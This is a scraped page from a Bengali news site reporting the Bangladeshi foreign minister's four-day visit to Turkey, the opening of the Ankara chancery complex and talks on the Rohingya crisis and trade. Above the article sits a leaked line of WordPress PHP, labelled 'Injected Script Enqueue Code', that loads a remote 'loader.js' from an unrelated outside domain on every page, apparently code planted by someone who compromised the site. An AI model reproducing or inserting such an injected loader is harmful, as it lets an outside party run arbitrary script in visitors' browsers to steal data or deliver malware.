// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site আজ তুরস্ক যাচ্ছেন পররাষ্ট্রমন্ত্রী - Janabarta.com

আজ তুরস্ক যাচ্ছেন পররাষ্ট্রমন্ত্রী

পররাষ্ট্রমন্ত্রী ড. এ কে আব্দুল মোমেন

নিজস্ব প্রতিবেদকঃ পররাষ্ট্রমন্ত্রী ড. এ কে আব্দুল মোমেন আজ রোববার চার দিনের সফরে তুরস্কে যাচ্ছেন। সফরে আগামী ১৫ সেপ্টেম্বর তুরস্কের পররাষ্ট্রমন্ত্রী মেভলুত চ্যাভুসোগ্লুর সঙ্গে তার দ্বিপক্ষীয় বৈঠক অনুষ্ঠিত হবে। এ ছাড়া দেশটির রাজধানী আঙ্কারায় অবস্থিত বাংলাদেশ চ্যান্সারি কমপ্লেক্সের উদ্বোধনী অনুষ্ঠানে যোগ দেবেন তিনি। আগামী ১৬ সেপ্টেম্বর ঢাকায় ফিরবেন পররাষ্ট্রমন্ত্রী।

জানা গেছে, আগামী ১৪ সেপ্টেম্বর আঙ্কারায় বাংলাদেশ চ্যান্সারি কমপ্লেক্সের উদ্বোধন করা হবে। প্রধানমন্ত্রী শেখ হাসিনা ঢাকা থেকে ভার্চুয়ালি যুক্ত হয়ে কমপ্লেক্সের উদ্বোধন করবেন। এ সময় পররাষ্ট্রমন্ত্রী আব্দুল মোমেন এবং তুরস্কের পররাষ্ট্রমন্ত্রী চ্যাভুসোগ্লু কমপ্লেক্সে উপস্থিত থাকবেন।

এর পর দিন ১৫ সেপ্টেম্বর আঙ্কারায় তুর্কি পররাষ্ট্রমন্ত্রীর সঙ্গে বাংলাদেশি পররাষ্ট্রমন্ত্রীর দ্বিপাক্ষিক বৈঠক অনুষ্ঠিত হবে। এতে রোহিঙ্গা সংকট, ডি-৮ সম্মেলন এবং দুই দেশের মধ্যে বাণিজ্য সহযোগিতার বিষয় প্রাধান্য পাবে।

turkey foreign minister 2
তুরস্কের পররাষ্ট্রমন্ত্রী মেভলুত চ্যাভুসোগ্লু

সফরে পররাষ্ট্রমন্ত্রী মোমেন তুরস্কের প্রেসিডেন্ট রিসেপ তাইয়্যিপ এরদোয়ানের সঙ্গেও সাক্ষাৎ করবেন। এ ছাড়া দেশটির ব্যবসায়ী প্রতিনিধি দল এবং ইসলামিক কো-অপারেশন ইয়ুথ ফোরামের (আইসিওয়াইএফ) সভাপতির সঙ্গেও তার বৈঠক করার কথা রয়েছে।

পররাষ্ট্রমন্ত্রী জানিয়েছেন, রোহিঙ্গা ইস্যু সমাধানে বাংলাদেশের পক্ষে অবস্থান নিয়েছে তুরস্ক। জাতিসংঘের নিরাপত্তা পরিষদের (ইউএনএসসি) পরবর্তী বৈঠকে আঙ্কারা রোহিঙ্গা প্রত্যাবাসন ইস্যুটি উত্থাপন করবে বলে ঢাকাকে আশ্বস্ত করেছে।